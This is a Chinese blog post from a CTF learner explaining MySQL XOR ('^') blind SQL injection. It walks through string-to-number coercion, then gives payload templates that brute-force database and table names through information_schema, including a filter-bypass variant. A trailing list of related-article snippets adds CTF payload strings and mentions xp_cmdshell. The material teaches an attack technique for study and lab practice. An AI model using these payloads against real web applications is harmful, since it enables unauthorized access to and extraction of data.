sql注入漏洞之异或注入

已于 2022-05-01 18:18:19 修改
阅读量7.9k 收藏 20
点赞数 9
分类专栏: 相关漏洞的学习 文章标签: 信息安全 mysql 安全漏洞 安全
于 2022-04-06 22:52:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/SoporAeternus12/article/details/124001820
版权

在介绍异或注入之前,先看看这个

mysql> select 'aaa'=0;
+---------+
| 'aaa'=0 |
+---------+
|       1 |
+---------+
1 row in set, 1 warning (0.00 sec)
#这里可以看到返回结果是1,表示true

mysql> select 'aaa'=1;
+---------+
| 'aaa'=1 |
+---------+
|       0 |
+---------+
1 row in set, 1 warning (0.00 sec)
#但这里返回的是false

查阅了相关文档后,发现这样一个特性。

在做string和数字型的值比较的时候,string会转换成数字,对于前面是数字的字符串,转换的时候就是转换成前面的数字,而前面不是以数字开头的字符串,转换的时候自然就是转换成0了,可以再看看下面两个例子。

mysql> select '1aaa'=1;
+----------+
| '1aaa'=1 |
+----------+
|        1 |
+----------+
1 row in set, 1 warning (0.00 sec)

mysql> select '12aaa'=1;
+-----------+
| '12aaa'=1 |
+-----------+
|         0 |
+-----------+
1 row in set, 1 warning (0.00 sec)

下面进入正题

什么是异或注入

异步注入说简单一点就是在构造where后面的判断条件时使用^(异或符号)来达到sql注入攻击的目的,通常异步注入与一些自动化脚本比如bp中的intrude模块或者自己写一个python脚本来配合使用。可以来看个例子。

mysql> select * from student;
+-----------+--------+------+------+-------+
| Sno       | Sname  | Ssex | Sage | Sdept |
+-----------+--------+------+------+-------+
| 201215121 | 李勇   ||   23 | CS    |
| 201215122 | 刘晨   ||   20 | CS    |
| 201215123 | 王敏   ||   19 | MA    |
| 201215125 | 张立   ||   20 | IS    |
| 200215128 | 陈冬   ||   19 | IS    |
| 201515000 | 小赵   ||   31 | IS    |
| 201515001 | 小钱   ||   29 | MA    |
| 201515002 | 小孙   ||   34 | MJ    |
| 201515003 | 小李   ||   26 | CS    |
| 201515004 | 小周   ||   42 | LI    |
+-----------+--------+------+------+-------+
10 rows in set (0.07 sec)

#这个是student表的内容

但如果我这样构造sql查询语句的话

mysql> select * from student where Sname='李勇'^1;
Empty set, 11 warnings (1.65 sec)

mysql> select * from student where Sname='李勇'^0;
+-----------+--------+------+------+-------+
| Sno       | Sname  | Ssex | Sage | Sdept |
+-----------+--------+------+------+-------+
| 201215121 | 李勇   ||   23 | CS    |
| 201215122 | 刘晨   ||   20 | CS    |
| 201215123 | 王敏   ||   19 | MA    |
| 201215125 | 张立   ||   20 | IS    |
| 200215128 | 陈冬   ||   19 | IS    |
| 201515000 | 小赵   ||   31 | IS    |
| 201515001 | 小钱   ||   29 | MA    |
| 201515002 | 小孙   ||   34 | MJ    |
| 201515003 | 小李   ||   26 | CS    |
| 201515004 | 小周   ||   42 | LI    |
+-----------+--------+------+------+-------+
10 rows in set, 11 warnings (0.00 sec)

为什么会是这个结果呢?
首先’李勇’^1做异或运算,结果会是1,因为该字符串转换成数字就是0,然后看看Sname=0这个表达式,我们不妨把每个元组都拿过来一个一个比较,每个元组的Sname转换成数字都是0,所以对于每个元组,该where后面的判断条件全部都是成立的,而Sname=1这个表达式自然就是都不成立。

如何利用异或运算来进行注入?

我们可以构造一条这样的sql语句

mysql> select * from student where Sname='李勇'^(length(database())!=$变量$);

通过构造这样类似的sql语句就可以得到当前数据库名的长度,也可以将语句稍微改改,通过脚本爆破出数据库名表名等,这里我就不演示太多了。

#查询数据库名
mysql> select * from student where Sname='李勇'^(substr(database(),$变量1$,1)!=$变量2$);

#查询表名
mysql> select * from student where Sname='李勇'^(substr((select table_name from information_schema.tables where table_schema=database() limit $变量1$,1),$变量2$,1)!=$变量3$);

总结

通常目标服务器没有对^符号进行过滤的时候,都可以尝试使用异或注入。之前我就遇到了一个把and,or,||,&&,union,select,注释等这些关键字都给过滤了的靶机,不过没有过滤掉异或符号,如果不知道有异或注入这种操作,这个靶机估计又要卡好久。。。学网安感觉很难有成就感,这并不是学一段时间就能做出一个东西出来的一门学科,并且很难看到自己的进步,每次做ctf的题目或是靶机,总能遇到以前从来没有见过的技术。麻了,睡觉去了。

漏洞挖掘】——128、 异或运算注入刨析
Fly_鹏程万里
07-03 444
异或是一种逻辑运算,运算法则简言之就是:两个条件相同(同真或同假)即为假(0),两个条件不同即为真(1),null与任何条件做异或运算都为null,如果从数学的角度理解就是空集与任何集合的交集都为空,mysql异或运算符为^或者xor,两个同为真或同为假的条件做异或,结果为假:两个不同为真或不同为假的条件做异或,结果为真:null与任何条件(真、假、null)做异或,结果都为null:^运算符——做位异或运算,例如:1^2=3xor做逻辑运算1 xor 0会输出1,其他情况会输出所有。
Web-异或注入-[CISCN2019 华北赛区 Day2 Web1]Hack World
lunan的博客
04-17 407
Web-异或注入-[CISCN2019 华北赛区 Day2 Web1]Hack World 一、知识点 1、异或注入 爆破法payload构造: payload = {"id":'0^' + '(ascii(substr((select(flag)from(flag)),' + str(i) + ',1))=' + str(j)+')'} 二分法payload构造: 0^(ascii(substr((select(flag)from(flag)),1,1))>1) 用途:可用于判断过滤 htt
SQL注入异或注入
2301_80395418的博客
04-27 718
异或注入
SQL盲注(异或注入
weixin_74036973的博客
10-31 1118
做题时偶然遇到一道sql注入很多关键字都过滤了看wp说是异或注入遂研究了一下什么是异或异或是干什么的?异或(XOR),在数学和逻辑运算中,是一种二元运算,表示为“⊕”或“^”。而这个真假是sql注入里面可以利用的以随便一张表为例(这里为pikachu的user表为例)我们先看一下表里都有什么内容有几个column我们接下来写一个sql查询语句这一句不是查询username=0的应该什么都查不出来的因为没有匹配的但是他查询出来所有了。
sql注入中的异或注入--sql注入加强版(盲注)[极客大挑战 2019]FinalSQL
qq_59020256的博客
12-25 1529
异或注入是盲注的一种类型,因为异或逻辑通常返回的是1和0,所以一般用于盲注中。这里'roo'=0所以说uname=0^1,所以说uname=1。这里'roo'=0所以说uname=0^0,所以说uname=0。这点我首先在用户名、密码输入了一系列的注入点发现都没有什么效果,这就是这个傻鸟靶场坑的地方。这里length(database())>0如果为真就为1,id=1^1,也就为id=0。id='1'^1这里也就等同于id=1^1,也就为id=0。当我点击1的时候,奇异的一幕发生了,我点击进去了。
mysql异或运算的sql注入判断_Bugku SQL注入题目总结 · Nancy’s Studio
weixin_32235191的博客
02-18 594
sql注入查看源码发现网页编码为gb2312,猜测考的是宽字节注入。关于宽字节注入可以参考大佬的详解:戳这里果然输入?id=1%df'出现了报错,说明已经可以注入了。1%df%27被转换成了1運,原因就是单引号前被添加了转义符,即%5c,在这里前面的%df和%5c结合形成了汉字,导致单引号成功逃逸。下面就可以直接操作了。?id=1%df'and version()>0 --+返回正确,说明数...
异或注入
xuchen16的博客
10-06 2053
转载自:https://www.jianshu.com/p/27df5c67157c 原理 异或是一种逻辑运算,运算法则简言之就是:两个条件相同(同真或同假)即为假(0),两个条件不同即为真(1),null与任何条件做异或运算都为null,如果从数学的角度理解就是,空集与任何集合的交集都为空。 mysql异或运算符为^ 或者 xor 两个同为真的条件做异或,结果为假 两个同为假的条件...
网络安全CTF竞赛中SQL注入攻击技术详解:常见题型与绕过方法分析
最新发布
06-12
②指导读者在实际CTF竞赛中快速识别并利用SQL注入漏洞;③提高读者对Web应用程序安全性的理解,增强防范意识。 阅读建议:由于SQL注入技术复杂多变,建议读者结合实际案例反复练习,并深入研究每种注入方式背后的...
网络安全CTF竞赛中SQL注入题型解析:常见攻击手法与绕过技巧总结
04-20
主要包括无过滤带回显的手工注入、万能密码及其变种、过滤部分字符后的绕过方法、Union联合查询绕过、SQL异或注入以及SQL盲注等六类典型问题。每种类型都配有详细的攻击流程、实际案例和可能用到的工具(如Firefox、...
SQL关键字解析:异或注入检测与自动过滤
SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过输入恶意SQL代码来操纵数据库,获取未经授权的数据或者破坏系统。文本中提到的"异或注入判断过滤"(使用'^length("§aaa§")!=0'这样的表达式)是一种在应用层面...
用bitand表示异或SQL脚本
07-12
用bitand表示异或SQL脚本函数,很实用, 欢迎下载~
16-OWASP top10--SQL注入(一)
XLbb的博客
05-25 1331
SQL注入式攻击技术,一般针对基于Web平台的应用程序.造成SQL注入攻击漏洞的原因,是由于程序员在编写Web程序时,没有对浏览器端提交的参数进行严格的过滤和判断。用户可以修改构造参数,提交SQL查询语句,并传递至服务器端,从而获取想要的敏感信息,甚至执行危险的代码或系统命令。虽然SQL注入攻击技术早已出现,但是时至今日仍然有很大一部分网站存在SQL注入漏洞,各大门户网站同样存在SQL注入漏洞
sql异同或注入总结
Aiwin的博客
10-12 2114
sql异同或注入总结与[NSSCTF 2022 Spring Recruit]babysql与[CISCN 2019华北Day2]Web1例题
SQL注入学习总结(八):其他SQL注入异或注入
weixin_30740295的博客
09-13 1283
其他类型注入的详解(5) 5.sql异或注入 背景当我们在尝试SQL注入时,发现union,and被完全过滤掉了,就可以考虑使用异或注入 知识点 异或运算规则: 1^1=0 0^0=0 0^1=1 1^1^1=0 1^1^0=0 构造payload:'^ascii(mid(database(),1,1)=98)^0 注意这里会多加一个^0或1是因为在盲注的时候可能出现了语法错误也无法判断,而改变这...
SQL注入
m0_51783376的博客
08-10 671
客户端对参数进行加密再传递,但这种方式使用的一般都是对称加密,在前端是能找到解密方式的,因此可修改参数加密后再注入。也可以使用 ***** 或 **-p **指定参数。由于资源限制,WAF无法对大量数据进行过滤,因此可以通过传入大量无用数据的方式绕过WAF。**xp_cmdshell:**sqlserver中的扩展脚本,可执行系统命令。**号分割语句,执行多条语句,当爆破出表名列名时可以尝试添加用户。**sp_oacreate:**利用OLE的run方法执行系统命令。**POST注入 : **...
异或盲注注入
lgsyydsa的博客
09-20 458
异或注入是通过sql语句中进行异或逻辑的注入方式。因为异或逻辑通常返回的是1和0,所以一般用于盲注中。因为'admin'^1结果为1,查询语句就变为username=1,而表里的username再与1比较,username会先变成数字再与1对比。因为‘admin’^0是0,username转为数字都是0,所以整个表都会出来。字符与字符:字符中如果没有数字或者数字在字母后面在比较时都会转为数字0。同理将‘admin’改为0时,也会是这种结果。数字与字符:将字符转为数字进行异或操作。用的是二分法,不是枚举。
sql语句中的逻辑运算:或、与、异或
热门推荐
07-05 4万+
文章转自:爱符号  http://www.afuhao.com/article_articleId-165.shtml 在讲SQL语句前,看看C#中,关于 或、与、异或 的操作吧,其它语言类似,就不多写了。javascript java 这些都是支持这个的 逻辑 或 操作 [csharp] int i= 1 | 3;//或,结果是3,因为3里
mysql异或运算的sql注入判断_报错法注入异或注入小结
weixin_39553156的博客
01-20 496
报错注入extractvalue报错注入法借用一下sqli-lab Less-18Less-18 Header Injection- Error Based- string Welcome Dhakkan Username : Password ://including the Mysql connect parameters.include("../sql-connections/sql-...
sql server 2005 T-SQL ^(位异或)(Transact-SQL)
曹振华
12-20 1951
对两个整数值执行“位异或”运算。 Transact-SQL 语法约定 语法 expression ^ expression 参数 expression是整数数据类型类别的任一数据类型、bit、binary 或 varbinary 数据类型的任何有效表达式。expression 被视为用于进行位运算的二进制数。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值